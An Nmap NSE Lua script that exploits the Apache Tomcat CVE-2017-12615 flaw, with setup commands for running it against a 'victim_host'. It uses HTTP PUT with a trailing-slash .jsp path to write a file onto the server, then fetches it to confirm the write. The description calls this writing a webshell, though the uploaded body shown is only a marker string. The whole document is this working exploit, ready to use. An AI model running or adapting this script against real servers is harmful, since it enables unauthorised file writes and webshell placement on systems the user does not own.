local stdnse = require "stdnse"
local http = require "http"

description = [[
for the vulnerability of tomcat-cve-2017-12615 This script will write a webshell into web server.
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -p 80,8080,8090,8899 --script XX.NSE victim_host
]]

prerule=function()
end
hostrule=function(host)
	return false
end

portrule=function(host,port)
	local ports = {80,8080,8090,8899}
	for i in pairs(ports)do
		if(port.number == ports[i])then
			return true
		end
	end
end


action = function(host,port)
	local shell_name = string.format("%sCVE-2017-12615-CHECK-%d.jsp","/",math.random(9999))
	local status = stdnse.output_table()
	local put_rsp = http.put(host,port,shell_name.."/",nil,"CVE-2017-12615")
	if(put_rsp.status == 201)then
		status.shell_name = shell_name
		local response = http.get(host,port,shell_name)
		if(response and http.response_contains(response,"CVE%-2017%-12615") )then
			return status
		end
		return false
	end
	return false
end
postrule=function()
end